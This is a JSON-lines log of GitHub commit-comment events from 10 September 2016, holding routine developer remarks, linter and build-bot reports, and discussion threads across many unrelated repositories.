{"id":"4544473475","type":"CommitCommentEvent","actor":{"login":"scottbedard"},"repo":{"name":"scottbedard/oc-vuetober-theme"},"payload":{"comment":{"id":18974556,"position":null,"line":null,"path":null,"commit_id":"04ca3badc7fde010d14da9598037dd09b0cd925b","created_at":"2016-09-10T18:19:00Z","updated_at":"2016-09-10T18:19:00Z","body":"Fixes #4 "}},"created_at":"2016-09-10T18:19:00Z"}
{"id":"4544476758","type":"CommitCommentEvent","actor":{"login":"HalosGhost"},"repo":{"name":"HalosGhost/pbpst"},"payload":{"comment":{"id":18974558,"position":null,"line":null,"path":null,"commit_id":"3d267131ea311be2beef428121caefbef25259df","created_at":"2016-09-10T18:21:23Z","updated_at":"2016-09-10T18:21:23Z","body":"Fixed a bug _and_ removed 6 lines of code! That's what I like to see!"}},"created_at":"2016-09-10T18:21:23Z"}
{"id":"4544479424","type":"CommitCommentEvent","actor":{"login":"nemtajo"},"repo":{"name":"nemtajo/Transcrypt"},"payload":{"comment":{"id":18974561,"position":null,"line":null,"path":null,"commit_id":"dedfb05bbe0cc85fc7c2134dce9bc5456c64ea72","created_at":"2016-09-10T18:23:21Z","updated_at":"2016-09-10T18:23:21Z","body":"This commit replaces the inserted plain characters in the input panel displayed with star characters, i.e. it effectively hides the password during the interaction with the user.\r\n\r\nStill, the commit needs improvements. For now, the only way to hide the password is to hide the input panel on each character entered/deleted (`on_change` method) and show a new input panel with star characters displayed. Hiding input panel invokes on_cancel method - which is bad, since ESC key also invokes the same method. it is not possible to make a separation between closing the input panel using ESC key and the logic currently implemented in `on_cancel` method. There is a way to do it using sublime's `on_query_context` method, but that requires a significant effort. Currently, it is possible to close the input panel by deleting all the characters inserted. The current implementation does not show the `Encrypt on save` input panel, but I tend to fix that soon. Cheers to everyone interested."}},"created_at":"2016-09-10T18:23:21Z"}
{"id":"4544480097","type":"CommitCommentEvent","actor":{"login":"Minione"},"repo":{"name":"Atcold/torch-TripletEmbedding"},"payload":{"comment":{"id":18974562,"position":29,"line":34,"path":"TripletEmbedding.lua","commit_id":"742599ce761b2d6cf128068b8f6fd327ad633a31","created_at":"2016-09-10T18:23:50Z","updated_at":"2016-09-10T18:23:50Z","body":"I think in  line 32-34, 'repeatTensor(a:size(2),1):t()' should be replaced by 'repeatTensor(1, a:size(2))'. This is because the shape of 'self.Li' is 'N*1 instead of N or 1*N."}},"created_at":"2016-09-10T18:23:50Z"}
{"id":"4544482434","type":"CommitCommentEvent","actor":{"login":"cynosura15"},"repo":{"name":"Cybermissia/CellPop"},"payload":{"comment":{"id":18974564,"position":null,"line":null,"path":null,"commit_id":"4deaa37ac666cfd5d281d1e4a8df75773e98ce77","created_at":"2016-09-10T18:25:24Z","updated_at":"2016-09-10T18:25:24Z","body":"Mdr n00b"}},"created_at":"2016-09-10T18:25:24Z"}
{"id":"4544488053","type":"CommitCommentEvent","actor":{"login":"secgroundzero"},"repo":{"name":"secgroundzero/warberry"},"payload":{"comment":{"id":18974582,"position":null,"line":null,"path":null,"commit_id":"96ee9204f48ae1d4995c11b87e013e36497e25dc","created_at":"2016-09-10T18:29:22Z","updated_at":"2016-09-10T18:29:22Z","body":"install what exactly?"}},"created_at":"2016-09-10T18:29:22Z"}
{"id":"4544490372","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18974587,"position":null,"line":null,"path":null,"commit_id":"abd6077c2312c03f7fda1a737a8e2fa2ef5d5002","created_at":"2016-09-10T18:30:54Z","updated_at":"2016-09-10T18:30:54Z","body":"[R/comorbid.R:341:33:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L341) *warning:* **no visible binding for global variable ‘icd9_map_ahrq’**\n```r\n​  cbd <- icd9_comorbid(x, map = icd9_map_ahrq, short_map = TRUE, ...)\n                                ^~~~~~~~~~~~~\n```\n[R/comorbid.R:348:34:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L348) *warning:* **no visible binding for global variable ‘icd10_map_ahrq’**\n```r\n​  cbd <- icd10_comorbid(x, map = icd10_map_ahrq, short_map = TRUE, ...)\n                                 ^~~~~~~~~~~~~~\n```\n[R/comorbid.R:355:33:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L355) *warning:* **no visible binding for global variable ‘icd9_map_elix’**\n```r\n​  cbd <- icd9_comorbid(x, map = icd9_map_elix, short_map = TRUE, ...)\n                                ^~~~~~~~~~~~~\n```\n[R/comorbid.R:362:34:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L362) *warning:* **no visible binding for global variable ‘icd10_map_elix’**\n```r\n​  cbd <- icd10_comorbid(x, map = icd10_map_elix, short_map = TRUE, ...)\n                                 ^~~~~~~~~~~~~~\n```\n[R/comorbid.R:369:33:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L369) *warning:* **no visible binding for global variable ‘icd9_map_quan_elix’**\n```r\n​  cbd <- icd9_comorbid(x, map = icd9_map_quan_elix, short_map = TRUE, ...)\n                                ^~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:376:34:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L376) *warning:* **no visible binding for global variable ‘icd10_map_quan_elix’**\n```r\n​  cbd <- icd10_comorbid(x, map = icd10_map_quan_elix, short_map = TRUE, ...)\n                                 ^~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:383:33:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L383) *warning:* **no visible binding for global variable ‘icd9_map_quan_deyo’**\n```r\n​  cbd <- icd9_comorbid(x, map = icd9_map_quan_deyo, short_map = TRUE, ...)\n                                ^~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:390:34:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L390) *warning:* **no visible binding for global variable ‘icd10_map_quan_deyo’**\n```r\n​  cbd <- icd10_comorbid(x, map = icd10_map_quan_deyo, short_map = TRUE, ...)\n                                 ^~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:397:34:](https://github.com/jackwasey/icd/blob/abd6077c2312c03f7fda1a737a8e2fa2ef5d5002/R/comorbid.R#L397) *warning:* **no visible binding for global variable ‘icd10_map_quan_deyo’**\n```r\n​  cbd <- icd10_comorbid(x, map = icd10_map_quan_deyo, short_map = TRUE, ...)\n                                 ^~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-10T18:30:54Z"}
{"id":"4544490427","type":"CommitCommentEvent","actor":{"login":"shirmohammad"},"repo":{"name":"shirmohammad/Tutorial"},"payload":{"comment":{"id":18974588,"position":null,"line":null,"path":null,"commit_id":"e5042a1cc42ebd51c281559e769678b87a7fec4c","created_at":"2016-09-10T18:30:56Z","updated_at":"2016-09-10T18:30:56Z","body":"e5042a1"}},"created_at":"2016-09-10T18:30:56Z"}
{"id":"4544491806","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974591,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T18:31:55Z","updated_at":"2016-09-10T18:31:55Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T18:31:55Z"}
{"id":"4544492294","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18974592,"position":null,"line":null,"path":null,"commit_id":"86995ac11c3ce888166a70ec462c66019ec78a27","created_at":"2016-09-10T18:32:15Z","updated_at":"2016-09-10T18:32:15Z","body":"There are a bunch of errors like\r\n``/spl-rwlock.c:41:31: error: ‘struct rw_semaphore’ has no member named ‘wait_lock’``\r\nor\r\n``rwsem_compat.h:45:29: error: ‘struct rw_semaphore’ has no member named ‘count’``\r\n...\r\nA while ago we found [some information](https://github.com/manjaro/packages-community/pull/189#issuecomment-226376267) about these kinds of issues and it didn't look like there was currently a way to make this work..."}},"created_at":"2016-09-10T18:32:15Z"}
{"id":"4544492666","type":"CommitCommentEvent","actor":{"login":"tapu016"},"repo":{"name":"tapu016/hello-world"},"payload":{"comment":{"id":18974593,"position":null,"line":null,"path":null,"commit_id":"369e0c02e6e22172394f01a5f8764d57382026ed","created_at":"2016-09-10T18:32:30Z","updated_at":"2016-09-10T18:32:30Z","body":"changes done"}},"created_at":"2016-09-10T18:32:30Z"}
{"id":"4544493580","type":"CommitCommentEvent","actor":{"login":"Robophil"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18974594,"position":23,"line":19,"path":"index.html","commit_id":"e831b089da8f0af817dcc8ccc87704b2ea83641c","created_at":"2016-09-10T18:33:04Z","updated_at":"2016-09-10T18:33:04Z","body":"True, but during development that could be a drag. \r\nIt would be harder to debug from minified version and testing would take much longer as you'll have to save, then minify as opposed to just saving. "}},"created_at":"2016-09-10T18:33:04Z"}
{"id":"4544495368","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18974595,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-10T18:34:14Z","updated_at":"2016-09-10T18:34:14Z","body":"I'm glad that you notice every detail.\n\nI was getting an error from piecewise, so I wanted to see what the input to\npiecewise was. I thought that I couldn't `trace` piecewise because it's\nbuiltin. It turns out that you can (at least in Maple 2016) `trace` a\nbuiltin procedure to the limited extent that it'll show you what the input\nis. After I figured out the bug, I thought that I might as well leave in\nany debugging hooks in case they're ever needed again.\n\n\n\nOn Sat, Sep 10, 2016 at 9:00 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> I don't understand the use of %piecewise here (line 414 of Hakaru.mpl).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/c6cf109ef9fabfc88cd363869c6f5a936524d90d#commitcomment-18973573>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9RbYJOq1D_UjU_lZ9ci-BvJlq2eEks5qoqoEgaJpZM4J5txv>\n> .\n>\n"}},"created_at":"2016-09-10T18:34:14Z"}
{"id":"4544495373","type":"CommitCommentEvent","actor":{"login":"shirmohammad"},"repo":{"name":"shirmohammad/Tutorial"},"payload":{"comment":{"id":18974596,"position":null,"line":null,"path":null,"commit_id":"e5042a1cc42ebd51c281559e769678b87a7fec4c","created_at":"2016-09-10T18:34:14Z","updated_at":"2016-09-10T18:34:14Z","body":"DOC\t diff=astextplain"}},"created_at":"2016-09-10T18:34:14Z"}
{"id":"4544495785","type":"CommitCommentEvent","actor":{"login":"shirmohammad"},"repo":{"name":"shirmohammad/Tutorial"},"payload":{"comment":{"id":18974597,"position":1,"line":1,"path":"README.md","commit_id":"e5042a1cc42ebd51c281559e769678b87a7fec4c","created_at":"2016-09-10T18:34:32Z","updated_at":"2016-09-10T18:34:32Z","body":"DOC\t diff=astextplain"}},"created_at":"2016-09-10T18:34:32Z"}
{"id":"4544497172","type":"CommitCommentEvent","actor":{"login":"eddie-knight"},"repo":{"name":"codeupconnect/codeupconnect.dev"},"payload":{"comment":{"id":18974598,"position":null,"line":null,"path":null,"commit_id":"726455b7d81298cf21063dd3f446fdb0cb86b206","created_at":"2016-09-10T18:35:31Z","updated_at":"2016-09-10T18:35:31Z","body":"comment on this one is wrong... was struggling through activating mailgun. still not working."}},"created_at":"2016-09-10T18:35:31Z"}
{"id":"4544497612","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":18974600,"position":null,"line":null,"path":null,"commit_id":"d14d9c19693bd5b1ba999b8cf0865aead301ab7f","created_at":"2016-09-10T18:35:46Z","updated_at":"2016-09-10T18:35:46Z","body":"LGTM, Ship it!!!!"}},"created_at":"2016-09-10T18:35:46Z"}
{"id":"4544500453","type":"CommitCommentEvent","actor":{"login":"theo4u"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18974606,"position":23,"line":19,"path":"index.html","commit_id":"e831b089da8f0af817dcc8ccc87704b2ea83641c","created_at":"2016-09-10T18:37:49Z","updated_at":"2016-09-10T18:37:49Z","body":"yh , you can use chrome to make it normal during debug"}},"created_at":"2016-09-10T18:37:49Z"}
{"id":"4544500690","type":"CommitCommentEvent","actor":{"login":"anroots"},"repo":{"name":"improv-jaa/improfestival-2016"},"payload":{"comment":{"id":18974607,"position":22,"line":30,"path":"_workshops/50-characters-in-3-hours.md","commit_id":"79b9cc1296c108404577d269eae43c27b7b14754","created_at":"2016-09-10T18:37:57Z","updated_at":"2016-09-10T18:37:57Z","body":"This link needs http:// prefix"}},"created_at":"2016-09-10T18:37:57Z"}
{"id":"4544501426","type":"CommitCommentEvent","actor":{"login":"jberkenbilt"},"repo":{"name":"tschoening/qpdf"},"payload":{"comment":{"id":18974608,"position":null,"line":null,"path":null,"commit_id":"35626e8bcf290074744e4e8d433b291ebf70e2a2","created_at":"2016-09-10T18:38:23Z","updated_at":"2016-09-10T18:38:23Z","body":"So many months have passed....since your original request, I have made other changes to the Windows notes to explain how to support newer toolchains. Most of your suggestions were already incorporated indirectly as my new instructions tell the user to fix the path rather than renaming things. I did add some clarifying language about MSYS perl. Thanks. I haven't merged this to master yet, but it's in my work branch on my fork (jberkenbilt/qpdf). Note that I reserve the right to rebase and force push to my fork at will."}},"created_at":"2016-09-10T18:38:23Z"}
{"id":"4544503007","type":"CommitCommentEvent","actor":{"login":"yixuan"},"repo":{"name":"yixuan/prettydoc"},"payload":{"comment":{"id":18974611,"position":14,"line":86,"path":"README.md","commit_id":"27cb36165948e9fce1f2738b6e69d7123c75a550","created_at":"2016-09-10T18:39:17Z","updated_at":"2016-09-10T18:39:17Z","body":"Glad you like it. :smile:"}},"created_at":"2016-09-10T18:39:17Z"}
{"id":"4544503168","type":"CommitCommentEvent","actor":{"login":"khanfrd"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18974612,"position":null,"line":null,"path":null,"commit_id":"4dd886eb6ea57a51f5cad2fbf5ebc2f2a74e20ea","created_at":"2016-09-10T18:39:22Z","updated_at":"2016-09-10T18:39:22Z","body":"then you might enable it "}},"created_at":"2016-09-10T18:39:22Z"}
{"id":"4544503312","type":"CommitCommentEvent","actor":{"login":"krzys-h"},"repo":{"name":"colobot/colobot-data"},"payload":{"comment":{"id":18974613,"position":61,"line":56,"path":"help/cbot/E/class.txt","commit_id":"ea32d482c5f78e4ac92fa07cad6685a9f21645ce","created_at":"2016-09-10T18:39:28Z","updated_at":"2016-09-10T18:39:28Z","body":"example*"}},"created_at":"2016-09-10T18:39:28Z"}
{"id":"4544503989","type":"CommitCommentEvent","actor":{"login":"marcus-vnascimento"},"repo":{"name":"marcus-vnascimento/to-do-list"},"payload":{"comment":{"id":18974614,"position":null,"line":null,"path":null,"commit_id":"eef3acd5f0e9ff8d91e91cd913bb68b64d1e5121","created_at":"2016-09-10T18:39:51Z","updated_at":"2016-09-10T18:39:51Z","body":"Testando pull"}},"created_at":"2016-09-10T18:39:51Z"}
{"id":"4544504655","type":"CommitCommentEvent","actor":{"login":"theo4u"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18974616,"position":23,"line":19,"path":"index.html","commit_id":"e831b089da8f0af817dcc8ccc87704b2ea83641c","created_at":"2016-09-10T18:40:14Z","updated_at":"2016-09-10T18:40:14Z","body":"anyway is all aiit"}},"created_at":"2016-09-10T18:40:14Z"}
{"id":"4544505548","type":"CommitCommentEvent","actor":{"login":"Robophil"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18974617,"position":23,"line":19,"path":"index.html","commit_id":"e831b089da8f0af817dcc8ccc87704b2ea83641c","created_at":"2016-09-10T18:40:43Z","updated_at":"2016-09-10T18:40:43Z","body":"Yh, but you'll loose the line jump to the error even after you prettify it from chrome"}},"created_at":"2016-09-10T18:40:43Z"}
{"id":"4544506590","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18974619,"position":null,"line":null,"path":null,"commit_id":"86995ac11c3ce888166a70ec462c66019ec78a27","created_at":"2016-09-10T18:41:22Z","updated_at":"2016-09-10T18:41:22Z","body":"Try to apply https://github.com/zfsonlinux/spl/commit/a6ae97caed620b0e9e0575346062c751f6f15483 or test if **v0.7.0-rc1** works for you ..."}},"created_at":"2016-09-10T18:41:22Z"}
{"id":"4544509374","type":"CommitCommentEvent","actor":{"login":"unnikrishnanc"},"repo":{"name":"unnikrishnanc/demo"},"payload":{"comment":{"id":18974621,"position":null,"line":null,"path":null,"commit_id":"fb17610f074f36ae3cd83faab0df405b61e087eb","created_at":"2016-09-10T18:42:59Z","updated_at":"2016-09-10T18:42:59Z","body":"demo"}},"created_at":"2016-09-10T18:42:59Z"}
{"id":"4544509568","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974622,"position":26,"line":26,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:43:05Z","updated_at":"2016-09-10T18:43:05Z","body":"Line is too long. [96/80]"}},"created_at":"2016-09-10T18:43:05Z"}
{"id":"4544509613","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974623,"position":27,"line":27,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:43:07Z","updated_at":"2016-09-10T18:43:07Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T18:43:07Z"}
{"id":"4544509638","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974624,"position":28,"line":28,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:43:08Z","updated_at":"2016-09-10T18:43:08Z","body":"Do not use semicolons to terminate expressions."}},"created_at":"2016-09-10T18:43:08Z"}
{"id":"4544509695","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974625,"position":32,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:43:10Z","updated_at":"2016-09-10T18:43:10Z","body":"Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||."}},"created_at":"2016-09-10T18:43:10Z"}
{"id":"4544509748","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974626,"position":32,"line":32,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:43:12Z","updated_at":"2016-09-10T18:43:12Z","body":"Do not use then for multi-line if."}},"created_at":"2016-09-10T18:43:12Z"}
{"id":"4544509898","type":"CommitCommentEvent","actor":{"login":"unnikrishnanc"},"repo":{"name":"unnikrishnanc/demo"},"payload":{"comment":{"id":18974627,"position":2,"line":2,"path":"README.md","commit_id":"fb17610f074f36ae3cd83faab0df405b61e087eb","created_at":"2016-09-10T18:43:15Z","updated_at":"2016-09-10T18:43:15Z","body":"tried again"}},"created_at":"2016-09-10T18:43:15Z"}
{"id":"4544510326","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18974629,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-10T18:43:31Z","updated_at":"2016-09-10T18:43:31Z","body":"For me things just work better with V2, so again: What is the benefit of using netty? I'm guessing netty can do a lot of fancy stuff, but I can't see that we use that. What we utilize is a very simple http server, and I'm still in the dark as to what is the advantage.. anyone?"}},"created_at":"2016-09-10T18:43:31Z"}
{"id":"4544510507","type":"CommitCommentEvent","actor":{"login":"ornimamarketing"},"repo":{"name":"ornimamarketing/creamcakesmanufacturer"},"payload":{"comment":{"id":18974630,"position":null,"line":null,"path":null,"commit_id":"feefe74ccb07519789c3cdee3e5dab4160c3f083","created_at":"2016-09-10T18:43:37Z","updated_at":"2016-09-10T18:43:37Z","body":"ornima is leading manufacturer of cream cakes fruit filling cakes and other ingredient of Bakery Industries in India and Ornima is also exporting to other countries "}},"created_at":"2016-09-10T18:43:37Z"}
{"id":"4544512362","type":"CommitCommentEvent","actor":{"login":"colevahey"},"repo":{"name":"colevahey/miniature-enigma"},"payload":{"comment":{"id":18974632,"position":null,"line":null,"path":null,"commit_id":"ce21d82162619d6d9ecfaf7f89adfd8be31da947","created_at":"2016-09-10T18:44:45Z","updated_at":"2016-09-10T18:44:45Z","body":"Phase 1"}},"created_at":"2016-09-10T18:44:45Z"}
{"id":"4544517661","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18974635,"position":null,"line":null,"path":null,"commit_id":"7ed359cb14836abd241ca1c2a3b40376be1c9a87","created_at":"2016-09-10T18:47:54Z","updated_at":"2016-09-10T18:47:54Z","body":"Thanks. Hooray for op(0, ...). If you need to dispatch by type rather than\nan exact match on op(0, ...), it requires an extra line of code using\nmembertype plus an ad hoc matching of integers to operators.\n\nWhat's \"AST\"? I'm guessing that the T is tree, and \"terminals\" are what I\ncall \"leaves\".\n\nOn Sat, Sep 10, 2016 at 8:59 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> Love the table lookup in negated_relation! It's the perfect way to do\n> language-based dispatch when the language is a pure AST and you can\n> dispatch on the non-terminals.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/7ed359cb14836abd241ca1c2a3b40376be1c9a87#commitcomment-18973567>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9QB1EnU4srT19cu9u8W3GYdn8SLfks5qoqmrgaJpZM4J5twj>\n> .\n>\n"}},"created_at":"2016-09-10T18:47:54Z"}
{"id":"4544518554","type":"CommitCommentEvent","actor":{"login":"danbst"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18974636,"position":null,"line":null,"path":null,"commit_id":"0a6221578aabcc8676b42e76cd261518de2fdd92","created_at":"2016-09-10T18:48:34Z","updated_at":"2016-09-10T18:48:34Z","body":"Excuse me for a dumb question, but what are pros and cons of using ExecStart vs `script`?"}},"created_at":"2016-09-10T18:48:34Z"}
{"id":"4544520822","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974638,"position":-39,"line":-39,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:49:59Z","updated_at":"2016-09-10T18:49:59Z","body":"Missing top-level class documentation comment."}},"created_at":"2016-09-10T18:49:59Z"}
{"id":"4544520858","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974639,"position":-36,"line":-36,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:50:01Z","updated_at":"2016-09-10T18:50:01Z","body":"Don't use parentheses around a method call."}},"created_at":"2016-09-10T18:50:01Z"}
{"id":"4544520918","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974640,"position":-36,"line":-36,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:50:03Z","updated_at":"2016-09-10T18:50:03Z","body":"Line is too long. [120/80]"}},"created_at":"2016-09-10T18:50:03Z"}
{"id":"4544521006","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974641,"position":-36,"line":-36,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:50:06Z","updated_at":"2016-09-10T18:50:06Z","body":"Don't use parentheses around a method call."}},"created_at":"2016-09-10T18:50:06Z"}
{"id":"4544521125","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974642,"position":-36,"line":-36,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:50:11Z","updated_at":"2016-09-10T18:50:11Z","body":"Surrounding space missing for operator +."}},"created_at":"2016-09-10T18:50:11Z"}
{"id":"4544521215","type":"CommitCommentEvent","actor":{"login":"mikkame"},"repo":{"name":"mikkame/ore-ci2"},"payload":{"comment":{"id":18974643,"position":-35,"line":-35,"path":"helper.rb","commit_id":"2d695bf021582fbe625fb438e82892e78c9ea6ce","created_at":"2016-09-10T18:50:13Z","updated_at":"2016-09-10T18:50:13Z","body":"Use the new Ruby 1.9 hash syntax."}},"created_at":"2016-09-10T18:50:13Z"}
{"id":"4544523819","type":"CommitCommentEvent","actor":{"login":"zaxtax"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18974646,"position":null,"line":null,"path":null,"commit_id":"7ed359cb14836abd241ca1c2a3b40376be1c9a87","created_at":"2016-09-10T18:51:49Z","updated_at":"2016-09-10T18:51:49Z","body":"Yep, all your guesses are correct. It stands for Abstract Syntax Tree. It's\na term used for the tree datastructure that holds expressions and gives\neasy access to sub-expressions.\n\nOn Sat, Sep 10, 2016 at 2:47 PM, Carl J Love <notifications@github.com>\nwrote:\n\n> Thanks. Hooray for op(0, ...). If you need to dispatch by type rather than\n> an exact match on op(0, ...), it requires an extra line of code using\n> membertype plus an ad hoc matching of integers to operators.\n>\n> What's \"AST\"? I'm guessing that the T is tree, and \"terminals\" are what I\n> call \"leaves\".\n>\n> On Sat, Sep 10, 2016 at 8:59 AM, Jacques Carette <notifications@github.com\n> >\n> wrote:\n>\n> > Love the table lookup in negated_relation! It's the perfect way to do\n> > language-based dispatch when the language is a pure AST and you can\n> > dispatch on the non-terminals.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/hakaru-dev/hakaru/commit/\n> 7ed359cb14836abd241ca1c2a3b40376be1c9a87#commitcomment-18973567>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> ASYo9QB1EnU4srT19cu9u8W3GYdn8SLfks5qoqmrgaJpZM4J5twj>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/7ed359cb14836abd241ca1c2a3b40376be1c9a87#commitcomment-18974635>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAhUXSXM6mPezNYTtOPuzgwnJVESIY4ks5qovtbgaJpZM4J5twj>\n> .\n>\n"}},"created_at":"2016-09-10T18:51:49Z"}
{"id":"4544525363","type":"CommitCommentEvent","actor":{"login":"swetha969"},"repo":{"name":"swetha969/githubapi_using_angularjs"},"payload":{"comment":{"id":18974649,"position":null,"line":null,"path":null,"commit_id":"6e8ada03705a4d6a5156fcac6fe67135730c6ffb","created_at":"2016-09-10T18:53:05Z","updated_at":"2016-09-10T18:53:05Z","body":"\r\n[github.zip](https://github.com/swetha969/githubapi_using_angularjs/files/465583/github.zip)\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-10T18:53:05Z"}
{"id":"4544526664","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974650,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T18:54:05Z","updated_at":"2016-09-10T18:54:05Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T18:54:05Z"}
